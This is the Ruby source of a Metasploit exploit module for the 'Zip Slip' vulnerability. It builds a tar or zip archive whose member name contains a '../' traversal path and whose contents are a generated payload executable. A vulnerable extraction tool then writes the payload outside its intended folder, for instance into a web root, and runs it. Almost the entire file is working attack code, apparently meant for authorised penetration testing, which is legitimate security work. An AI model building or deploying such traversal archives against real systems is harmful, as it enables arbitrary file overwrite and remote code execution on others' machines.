GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/fileformat/zip_slip.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
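class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  # Registers the module metadata and its three options: the output archive
  # name (FILENAME), the archive container (FTYPE) and the member name that
  # is written into the archive (TARGETPAYLOADPATH).
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Generic Zip Slip Traversal Vulnerability',
        'Description' => %q{
          This is a generic arbitrary file overwrite technique, which typically results in remote
          command execution. This targets a simple yet widespread vulnerability that has been
          seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.
          The idea is that often archive extraction libraries have no mitigations against
          directory traversal attacks. If an application uses it, there is a risk when opening an
          archive that is maliciously modified, and result in the embedded payload to be written
          to an arbitrary location (such as a web root), and result in remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Snyk', # Technique discovery
          'sinn3r', # Metasploit
          'ggkitsas'
        ],
        'References' => [
          ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
        'Platform' => ['linux', 'win', 'unix'],
        'Targets' => [
          ['Manually determined', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2018-06-05',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The name of the archive file', 'msf.tar']),
      OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip']]),
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
    ])
  end

  # Holds a single-member tar or zip archive. The member name is taken from
  # the caller as-is (after Rex::FileUtils.normalize_unix_path); this class
  # does no traversal filtering of its own, which is the exact check that
  # vulnerable extraction libraries are missing.
  class ZipSlipArchive
    # @return [String] packed archive bytes, built once in #initialize
    attr_reader :data
    # @return [String] member name stored in the archive
    attr_reader :fname
    # @return [String] bytes stored as the member's contents
    attr_reader :payload
    # @return [String] 'tar' or 'zip'
    attr_reader :type

    # @param n [String] member name (the TARGETPAYLOADPATH option)
    # @param p [String] member contents
    # @param t [String] archive type, 'tar' or 'zip'
    # @raise [ArgumentError] if t is neither 'tar' nor 'zip'
    def initialize(n, p, t)
      @fname = n
      @payload = p
      @type = t
      # Pack eagerly so callers can read #data without calling #make again.
      @data = make
    end

    # Packs a single-member archive of the configured type.
    #
    # @return [String] the archive bytes
    # @raise [ArgumentError] on an unsupported type
    def make
      path = Rex::FileUtils.normalize_unix_path(fname)

      case type
      when 'tar'
        contents = StringIO.new
        Rex::Tar::Writer.new(contents) do |t|
          t.add_file(path, 0o777) do |f|
            f.write(payload)
          end
        end
        # StringIO#string yields the whole buffer without a seek/read round trip.
        contents.string
      when 'zip'
        zip = Rex::Zip::Archive.new
        zip.add_file(path, payload)
        zip.pack
      else
        # FTYPE is an OptEnum, so this branch is only reachable by direct
        # callers of this class; fail loudly instead of returning nil.
        raise ArgumentError, "Unsupported archive type: #{type.inspect}"
      end
    end
  end

  # Generates the payload executable once and packs it into an archive of the
  # requested type under the given member name.
  #
  # @param target_payload_path [String] member name stored in the archive
  # @param type [String] 'tar' or 'zip'
  # @return [String] the archive bytes
  def make_archive(target_payload_path, type)
    exe = generate_payload_exe(code: payload.encoded)
    # ZipSlipArchive packs in its constructor; reading #data avoids the
    # redundant second generate_payload_exe/#make round the old code did.
    ZipSlipArchive.new(target_payload_path, exe, type).data
  end

  # Validates TARGETPAYLOADPATH, builds the archive and writes it out via
  # the FILEFORMAT mixin.
  def exploit
    target_payload_path = datastore['TARGETPAYLOADPATH']
    # Without a '../' segment the result is just an ordinary archive.
    unless target_payload_path.match?(%r{\.\./})
      print_error('Please set a traversal path')
      return
    end

    archive = make_archive(target_payload_path, datastore['FTYPE'])
    file_create(archive)
    print_status('When extracted, the payload is expected to extract to:')
    print_status(target_payload_path)
  end
end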
# A quick test:
#
# $ python
# >>> import tarfile
# >>> t = tarfile.open('test.tar')
# >>> t.extractall()
# >>> exit()
#